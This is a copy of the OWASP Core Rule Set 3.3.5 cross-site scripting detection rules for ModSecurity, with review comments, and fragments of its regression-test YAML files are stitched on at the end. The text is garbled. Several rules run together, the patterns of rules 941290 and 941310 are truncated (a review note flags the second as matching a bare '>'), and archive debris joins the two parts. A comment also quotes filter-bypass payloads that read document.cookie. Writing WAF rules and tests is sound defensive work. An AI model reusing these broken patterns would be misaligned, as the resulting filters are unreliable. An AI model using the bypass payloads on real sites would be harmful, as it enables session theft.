REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \ "id:941120,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Filter - Category 2: Event Handler Vector',\ logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 3 ]=- # # Regexp generated from util/regexp-assemble/regexp-941130.data using Regexp::Assemble. # To rebuild the regexp: # cd util/regexp-assemble # ./regexp-assemble.pl regexp-941130.data # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\S](?:!ENTITY\s+(?:\S+|%\s+\S+)\s+(?:PUBLIC|SYSTEM)|x(?:link:href|html|mlns)|data:text\/html|pattern\b.*?=|formaction|\@import|;base64)\b" \ "id:941130,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Filter - Category 3: Attribute Vector',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 4 ]=- # XSS vectors making use of javascript uri and tags, e.g.,

#
# Rule 941140 at a glance (paranoia level 1, phase 2):
# - Pattern, first alternative: an opening <applet>, <object>, <isindex>,
#   <embed>, <style>, <form> or <meta> tag, matched case-insensitively.
# - Pattern, second alternative: '=' or 'URL(' followed, before any '>', by
#   the letters S C R I P T and a ':'. Whitespace is tolerated between the
#   letters, and because only the 'script:' suffix is anchored, any URI
#   scheme ending in 'script:' is covered.
# - Targets: cookies (except names matching /__utm/), cookie names, the
#   User-Agent and Referer headers, argument names, argument values and XML
#   content.
# - Transformations: t:utf8toUnicode, t:urlDecodeUni, t:htmlEntityDecode,
#   t:jsDecode, t:cssDecode and t:removeNulls run before matching, so the
#   pattern is applied to the decoded form of the input.
# - On match: 'block' (the disruptive action is the one configured through
#   SecDefaultAction) and the critical anomaly score is added to
#   tx.xss_score and tx.anomaly_score_pl1.
# - Tuning: fields that legitimately carry HTML or CSS (rich-text editors,
#   CMS back ends) are the likely false-positive source; exclude the
#   specific argument for this rule id rather than disabling the rule.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\b[^>]*?>[\s\S]*?|(?:=|U\s*?R\s*?L\s*?\()\s*?[^>]*?\s*?S\s*?C\s*?R\s*?I\s*?P\s*?T\s*?:)" \
    "id:941140,\
    phase:2,\
    block,\
    capture,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
    msg:'XSS Filter - Category 4: Javascript URI Vector',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-xss',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# -=[ NoScript XSS Filters ]=-
# Ref: http://noscript.net/
#
# [NoScript InjectionChecker] HTML injection
#
# Regexp generated from util/regexp-assemble/regexp-941160.data using Regexp::Assemble.
# To rebuild the regexp:
#   cd util/regexp-assemble
#   ./regexp-assemble.pl regexp-941160.data
# Note that after assembly an ignore-case flag (i) is added to the Regexp::Assemble output:
#   Add ignore case flag between '?'
and ':': "(?i:...)" # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|(?:peech|ound)(?:start|end)|u(?:ccess|spend|bmit)|croll|how)|m(?:o(?:z(?:(?:pointerlock|fullscreen)(?:change|error)|(?:orientation|time)change|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|b(?:e(?:fore(?:(?:(?:de)?activa|scriptexecu)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving
|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ransition(?:cancel|end|run)|ime(?:update|out)|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom)|s(?:tyle|rc)|background|formaction|lowsrc|ping)[\s\x08]*?=|<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?(?:(?:a\W*?(?:n\W*?i\W*?m\W*?a\W*?t\W*?e|p\W*?p\W*?l\W*?e\W*?t|u\W*?d\W*?i\W*?o)|b\W*?(?:i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|a\W*?s\W*?e|o\W*?d\W*?y)|i?\W*?f\W*?r\W*?a\W*?m\W*?e|o\W*?b\W*?j\W*?e\W*?c\W*?t|i\W*?m\W*?a?\W*?g\W*?e?|e\W*?m\W*?b\W*?e\W*?d|p\W*?a\W*?r\W*?a\W*?m|v\W*?i\W*?d\W*?e\W*?o|l\W*?i\W*?n\W*?k)[^>\w]|s\W*?(?:c\W*?r\W*?i\W*?p\W*?t|t\W*?y\W*?l\W*?e|e\W*?t[^>\w]|v\W*?g)|m\W*?(?:a\W*?r\W*?q\W*?u\W*?e\W*?e|e\W*?t\W*?a[^>\w])|f\W*?o\W*?r\W*?m))" \ "id:941160,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'NoScript XSS InjectionChecker: HTML Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ 
ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [NoScript InjectionChecker] Attributes injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\\\(\[\.<]|[\s\S]*?(?:\bname\b|\\[ux]\d))|data:(?:(?:[a-z]\w+\/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:\/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|\W*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[\s\S]*?:[\s\S]*?\W*?u\W*?r\W*?l[\s\S]*?\(" \ "id:941170,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'NoScript XSS InjectionChecker: Attribute Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [Blacklist Keywords from Node-Validator] # https://raw.github.com/chriso/node-validator/master/validator.js # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm document.cookie document.write .parentnode .innerhtml window.location -moz-binding .*?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" \ "id:941190,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within 
%{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \ "id:941200,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i:(?:j|&#x?0*(?:74|4A|106|6A);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ "id:941210,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i:(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:b|&#x?0*(?:66|42|98|62);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ "id:941220,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]" \ "id:941290,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
#
# Scoring convention shared by the detection rules below: each one uses the
# `block` action and adds tx.critical_anomaly_score both to tx.xss_score and
# to the anomaly score of its own paranoia level.
#
# NOTE(review): the operator pattern of the next rule looks truncated in this
# copy. It opens with a dangling "]*" directly after "(?i)". As written, the
# first alternative would match a bare ">", which would fire on a large share
# of ordinary input. Compare against the upstream CRS 3.3.5 rule file before
# relying on this text.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*[\xbe>]|<[^\xbe]*\xbe" \
    "id:941310,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\
    msg:'US-ASCII Malformed Encoding XSS Filter - Attack Detected',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-tomcat',\
    tag:'attack-xss',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# https://nedbatchelder.com/blog/200704/xss_with_utf7.html
# UTF-7 encoding XSS filter evasion for IE.
# Reported by Vladimir Ivanov
#
# "+ADw-" and "+AD4-" are the UTF-7 forms of "<" and ">". The pattern matches
# an encoded "<" followed by an encoded or literal ">", or a literal "<"
# followed by an encoded ">". URL decoding appears twice in the transformation
# chain (t:urlDecodeUni, then t:urlDecode), so the pattern is evaluated after
# two rounds of URL decoding.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \
    "id:941350,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\
    msg:'UTF-7 Encoding IE XSS - Attack Detected',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-internet-explorer',\
    tag:'attack-xss',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# Defend against JSFuck and Hieroglyphy obfuscation of Javascript code
#
# https://en.wikipedia.org/wiki/JSFuck
# https://github.com/alcuadrado/hieroglyphy
#
# These JS obfuscations mostly aim for client side XSS exploits, hence the
# integration of this rule into the XSS rule group. But serverside JS could
# also be attacked via these techniques.
#
# Detection pattern / Core elements of JSFuck and Hieroglyphy are the
# following two items:
#   !![]
#   !+[]
#
# ModSecurity always transforms "+" into " " with query strings and the
# URLENCODE body processor (but not for JSON). So we need to check for
# the following patterns:
#   !![]
#   !+[]
#   ! []
#
# The rule runs with t:none only, so the pattern is evaluated against the
# variable value without any further decoding. The logdata string reports the
# whole matched variable rather than the captured fragment.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ![!+ ]\[\]" \
    "id:941360,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'JSFuck / Hieroglyphy obfuscation detected',\
    logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'attack-xss',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242/63',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# Prevent 941180 bypass by using JavaScript global variables
# Refer to: https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
#
# Examples:
#   - /?search=/?a=";+alert(self["document"]["cookie"]);//
#   - /?search=/?a=";+document+/*foo*/+.+/*bar*/+cookie;//
#
# The pattern looks for one of the global object names (self, document, this,
# top, window) followed, after optional whitespace, by a comment opener or by
# "[" or ")", and then a closing "]" or "*/".
#
# NOTE(review): ARGS_NAMES is not in this rule's target list, although the
# sibling rules in this group include it. Confirm that this is intentional.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \
    "id:941370,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:compressWhitespace,\
    msg:'JavaScript global variable found',\
    logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'attack-xss',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242/63',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"


# Paranoia-level gate, one rule per phase (1 and 2): when
# tx.executing_paranoia_level is below 2, processing skips ahead to the
# END-REQUEST-941-APPLICATION-ATTACK-XSS marker, so none of the rules that
# follow in this group are evaluated. Both gate rules are silent (pass, nolog).
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#

#
# This is a stricter sibling of rule 941100.
#
# It applies the @detectXSS operator (libinjection, per the rule message) to
# the Referer request header only. It scores into tx.anomaly_score_pl2.
#
SecRule REQUEST_HEADERS:Referer "@detectXSS" \
    "id:941101,\
    phase:2,\
    block,\
    capture,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
    msg:'XSS Attack Detected via libinjection',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-xss',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    tag:'paranoia-level/2',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"


#
# -=[ XSS Filters - Category 5 ]=-
# HTML attributes - src, style and href
#
# The pattern is broad: it matches any of the words style, src or href
# (case-insensitive, on word boundaries) that is followed anywhere later in
# the value by "=". The User-Agent header is also among the targets.
# NOTE(review): that breadth is presumably why the rule sits at paranoia
# level 2. Expect to tune exclusions for fields that carry markup or URLs.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \
    "id:941150,\
    phase:2,\
    block,\
    capture,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
    msg:'XSS Filter - Category 5: Disallowed HTML Attributes',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-xss',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    tag:'paranoia-level/2',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"


# Detect tags that are the most common direct HTML injection points.
# # # # # " output: log_contains: id "941330" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml000066400000000000000000000016541446122515100276250ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 941340.yaml tests: - test_title: 941340-1 desc: "IE XSS Filters - Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=' infoo.bar=&var2=whatever" version: HTTP/1.0 output: log_contains: id "941340" - test_title: 941340-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "payload=XSS" version: HTTP/1.0 output: log_contains: id "941340" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml000066400000000000000000000007761446122515100276320ustar00rootroot00000000000000--- meta: author: fgsch enabled: true name: 